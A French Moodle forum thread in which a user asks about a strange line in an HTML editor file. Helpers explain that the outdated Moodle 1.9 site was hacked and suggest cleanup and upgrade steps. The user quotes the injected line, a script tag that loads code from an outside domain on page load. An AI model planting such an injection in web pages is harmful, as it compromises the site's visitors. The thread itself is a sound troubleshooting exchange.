ligne de code etrange

ligne de code etrange

par slimane ben miled,
Nombre de réponses : 4

Je suis nouveau avec moodle et j'utilise moodle 1.9. 

J'ai eu un problème avec l'éditeur html. En ouvrant le fichier erreur sur mon navigateur j'ai eu le message suivant:

Horodatage : 2/1/14, 3:51:33 PM
Erreur : missing ; before statement
Fichier Source : http://monsite/enseignement/lib/editor/htmlarea/htmlarea.php?id=6
Ligne : 682, Colonne : 30
Code Source :
html += "<script src="http://mmu22nit.rr.nu/pmg.php?d=x"></script>

Est ce que quelqu'un peut me dire c'est quoi cette script et cette adresse ?

et comment je peut m'en débarrasser

cordialement

 

 

Moyenne des évaluations  -
En réponse à slimane ben miled

Re: ligne de code etrange

par Nicolas Martignoni,
Avatar Développeurs Avatar Développeurs de plugins Avatar Documentation writers Avatar Moodleurs particulièrement utiles Avatar Testeurs Avatar Traducteurs

Mauvaise nouvelle : votre installation a été piratée.

Ce n'est pas étonnant, sachant que la version 1.9 de Moodle date de plus de 7 ans et n'est plus supportée. Vous devriez revenir à une version non piratée et mettre à jour au plus vite.

Bon courage.

En réponse à Nicolas Martignoni

Re: ligne de code etrange

par slimane ben miled,

merci triste

que faire, je suis obliger de la garder encore 1 mois.

cordialement

En réponse à slimane ben miled

Re: ligne de code etrange

par Daniel Méthot,
Avatar Moodleurs particulièrement utiles

Bonjour,

Slimane dit "je suis obliger de la garder encore 1 mois."

Moodle est gratuit...

Et en plus bonne chance pour transférer vos formations de 1.9 à 2.6.1 !!!

Daniel

En réponse à slimane ben miled

Re: ligne de code etrange

par Stephan Sengupta,

Bonjour Slimane

Je ne sais pas dans quelle mesure vous pouvez survire avec ça durant un mois.

Si vous ne pouvez pas, voici comment je m'y prendrais (mais ça reste à valider par les autres membres...)

  1. je changerai les codes d'accès au serveur
  2. je mettrai à jour l'antivirus de mon PC
  3. Comme vous êtes prévoyant vous avez gardé le paquetage de la version 1.9... Alors, vous le décompactez sur votre PC. Vous chercherez le fichier php en question et remplacerez celui qui se trouve sur le serveur. Mais, remplacer signifie que vous renommer d'abord le fichier sur le serveur en remplaçant son extension .php par .vir et ensuite vous copier le nouveau fichier.
  4. vous testez, éventuellement vous ajustez le php avec des éléments du vir. Quand c'est bon vous supprimez le vir.

Ensuite, je ne peux que vous encourager de mettre à jour votre Moodle en suivant pas à pas les différents processus, jusqu'à une version supportée (idéalement la 2.6, mais ça dépend des plugins dont vous avez besoin).

Faites une copie de votre site et commencez la procédure de mise à jour sur la copie en test, pour vous faire la main sans peur de vous tromper. Documentez sous la forme d'un PV tout ce que vous faites avec des copies d'écrans et tentez de vous rendre compte du temps que cela prend. C'est sur cette base que vous pourrez planifier une mise à jour aussi importante, ceci de manière à perturber le moins possible les usagers du site de production.

Pour finir, vous pouvez vous passer la musique du film "mission impossible" et considérer que ce message s’auto-détruira dans 10 secondes... clin d’œil

Bonne chance !

Stephan